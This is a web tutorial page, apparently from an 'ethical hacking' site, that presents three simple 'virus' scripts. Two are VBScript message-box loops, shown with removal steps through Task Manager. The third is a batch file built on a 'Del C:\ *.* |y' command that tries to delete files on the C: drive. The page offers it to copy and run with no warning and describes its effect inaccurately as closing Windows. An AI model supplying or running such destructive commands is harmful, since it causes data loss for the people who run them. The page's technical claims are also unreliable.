hacking tutorials - vbs virus - hacker - ethical hacking - learn hacking - ethical hacking tutorials



  • In this hacking tutorial, we will see how the virus is created. We are trying to show a very basic harmless virus using vbs - visual basic script.

Virus 1:

Code :

MsgBox (" Wikitechy Virus - Vbs virus ")
click below button to copy the code. By Ethical hacking tutorial team

Instruction:

  • Save the file as virus.vbs The file should be saved in the vbs format.
virus

Learn ethical-hacking - ethical-hacking tutorial - virus - ethical-hacking examples - ethical-hacking programs

harmless virus

Learn ethical-hacking - ethical-hacking tutorial - harmless-virus - ethical-hacking examples - ethical-hacking programs

  • On clicking “OK” button the message box will go off.

Virus 2:

  • If we are looking for continuous message boxes. Change the code to loop into it. So that, we will get continuous message boxes.

code :

do
MsgBox (" Wikitechy Virus - Vbs virus ")
loop
click below button to copy the code. By Ethical hacking tutorial team
notepad virus

Learn ethical-hacking - ethical-hacking tutorial - notepad-virus - ethical-hacking examples - ethical-hacking programs

  • On clicking the message box “OK” button. We will get continuos message boxes.
harmless virus

Learn ethical-hacking - ethical-hacking tutorial - harmless-virus - ethical-hacking examples - ethical-hacking programs

How to remove virus :

  • Goto task bar and right click and select “Task Manager"
virus toolbar

Learn ethical-hacking - ethical-hacking tutorial - virus-toolbar - ethical-hacking examples - ethical-hacking programs

  • Your task manager will open
    • Search for “Microsoft Windows Based Script Host” in Windows10
    • Search for “wscript.exe” in Windows 7.
virus-end-task

Learn ethical-hacking - ethical-hacking tutorial - virus-end-task - ethical-hacking examples - ethical-hacking programs

  • Select the process, right click and click “End Task”. Your process is killed and your virus is killed

Virus 3:

  • Let’s see another Simple Virus To Crush The Window

Code :

@Echo off
Del C:\ *.* |y
click below button to copy the code. By Ethical hacking tutorial team
  • Save It As Anything.bat
batch-file

Learn ethical-hacking - ethical-hacking tutorial - batch-file - ethical-hacking examples - ethical-hacking programs

  • On clicking the bat file, automatically your windows will get closed.

Related Searches to vbs virus